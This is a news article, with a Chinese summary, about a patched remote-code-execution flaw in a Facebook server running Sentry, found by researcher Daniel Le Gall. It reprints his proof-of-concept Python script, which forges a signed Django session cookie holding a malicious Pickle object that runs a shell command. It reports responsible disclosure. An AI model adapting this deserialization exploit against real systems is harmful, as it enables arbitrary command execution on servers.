SCRT信息安全研究员Daniel 'Blaklis' Le Gall，发现Facebook的其中一台服务器存在远程代码执行漏洞。该漏洞是由于在其服务器上运行Sentry日志收集软件的编程错误。研究人员通过日志查看堆栈中的cookie细节处理应用程序使用Pickle的位置，能够制作出可在机器上运行命令的cookie，验证漏洞。虽然远程代码执行漏洞被认为是严重的问题，但截至Facebook修复该漏洞，没有任何Facebook用户数据通过未覆盖的漏洞暴露或访问。

Facebook has patched a remote-code execution flaw discovered in one of its servers.

Researcher Daniel 'Blaklis' Le Gall, of SCRT Information Security, said on Friday he bagged a $5,000 bug bounty from the social network for reporting a flaw that could be exploited to execute arbitrary commands using malicious cookies.

Though remote code execution bugs are considered serious problems, Le Gall noted that no Facebook user data was ever exposed or accessed via the uncovered hole. The bug was patched this month prior to today's disclosure.

The programming blunder was spotted in a Facebook server running the Sentry log collection software.

"While I was looking at the application, some stacktraces regularly popped on the page, for an unknown reason," Le Gall explained. "The application seemed to be unstable regarding the user password reset feature, which occasionally crashed."

Looking through the logs, the researcher noted that he was able see where in the stack the cookie details were handled, as well as spot where the application was using Pickle, a Python data serialization protocol that can be vulnerable to manipulation.

With that information, Le Gall was able to craft cookies that would run commands on the machine. Here is the proof-of-concept exploit – a simple cookie that will tell the server to ping back a response with a 30-second delay:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Say what you will about Facebook, but the company's handling of bug reports appears to be on point. Le Gall said that the the same day the flaw was reported, July 30, Facebook took down the server. Ten days later, a patch was in place and the server was brought back online.

The social network has made security a focal point in the aftermath of the Cambridge Analytica scandal, and in this case at least it appears to be paying off.